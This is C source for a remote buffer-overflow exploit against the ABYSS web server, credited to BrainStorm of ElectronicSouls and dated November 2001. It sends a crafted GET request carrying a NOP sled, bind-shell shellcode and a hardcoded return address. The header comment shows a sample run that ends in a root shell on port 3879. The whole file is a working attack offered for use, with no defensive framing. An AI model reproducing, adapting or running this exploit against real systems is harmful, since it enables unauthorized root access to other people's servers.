/*
 * CONFIDENTIAL SOURCE MATERIALS OF THE ElectronicSouls
 * KEEP THIS PRIVATE ! DO NOT LEAVE COPY'S ON UNPROTECTED SYSTEMS !
 *
 * ElectronicSouls ABYSS Remote Exploit
 * (C) BrainStorm - November 2001
 *
 * ABYSS aims to be a fully HTTP/1.1 compliant Web server. 
 * Its main design goals are speed, low resource usage and portability. 
 * ABYSS works on most UNIX based systems..
 * it seems that the GET and maybe also the HEAD command have exploitable
 * buffer overflows and maybe format strings..
 * this is pre-alpha c0de to future test this bugs.
 * DO NOT DISTRIBUTE THIS FILE !!
 *
 * [user@sys ~]$ ./aby2 xxx.xxx.xxx.xxx 80
 * Abyss httpd Exploit by BrainStorm ((ElectronicSouls)) 
 *
 * - Genetrating overflow packet..
 * - Overflow packet generated.
 * - Connecting ... 
 * - transmitting exploit code...
 * Connect to port 3879 on victim host...enjoy ;> 
 * [user@sys ~]$ telnet xxx.xxx.xxx.xxx 3879
 * Trying xxx.xxx.xxx.xxx...
 * Connected to xxx.xxx.xxx.xxx..
 * Escape character is '^]'.
 * id;
 * uid=0(root) gid=0(root) groups=0(root)
 *
 * Note! for now my status is: sometimes it works sometimes not,
 *       more research needs to be done and some more test systems would be nice too.. 
 */


#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

#define ES 157 


struct in_addr victim;
  char overflow[4100];

char shellcode[] = // bind a shell to port 3879

"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";


int overflowed(char *ret)
{
    int i;

    memset(overflow, 0, sizeof(overflow));
    strcpy(overflow,"GET /");
    printf("- Genetrating overflow packet..\n");
    for(i=0;i<(ES-(strlen(shellcode))); i++)
    {
    strcat(overflow,"\x90");
    }
    strcat(overflow, shellcode);
    strcat(overflow, ret);
    strcat(overflow, ret);
    printf("- Overflow packet generated.\n");
}

int env(struct in_addr addr,char *cport)
{
    struct sockaddr_in serv;
    int s;

    int port=atoi(cport);

    s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    bzero(&serv,sizeof(serv));

    memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr));
    printf("- Connecting ... \n");
    serv.sin_port=htons(port);
    serv.sin_family=AF_INET;

    if (connect(s,(struct sockaddr*)&serv,sizeof(serv)) < 0)
    {
    perror("connect");
    exit(0);
    }
    printf("- transmitting exploit code...\n");
    write(s,overflow,strlen(overflow));
    write(s,"\n\n",2);
    close(s);
}

int host_to_ip(char *hostname,struct in_addr *addr)
{
 struct hostent *res;
 res=gethostbyname(hostname);

 if (res==NULL)
 return(0);

 memcpy((char *)addr,res->h_addr,res->h_length);
 return(1);
}

int main(int argc, char **argv)
{
    char ret[8], serv[256], port[8];
    printf("Abyss httpd Exploit by BrainStorm ((ElectronicSouls)) \n\n");

    if(argc<2) 
    {
     printf("Usage : %s <IP> [port]\n",argv[0]);
     exit(0);
    }
    if(argc==3)
    {
     strncpy(port, argv[2], 7);
    }
    else
    {
     strcpy(port, "80\0");
    }
    strcpy(ret, "\xbf\xff\xf9\x70"); 
    strncpy(serv, argv[1], sizeof(serv)-1);
    overflowed(ret);
    if (!host_to_ip(serv,&victim))
    {
     fprintf(stderr,"Hostname lookup failure\n");
     exit(0);
    }
    env(victim,port);
    printf("Here we go..now connect to port 3879 on victim host and see if it worked...enjoy ;> \n");
    exit(0);
}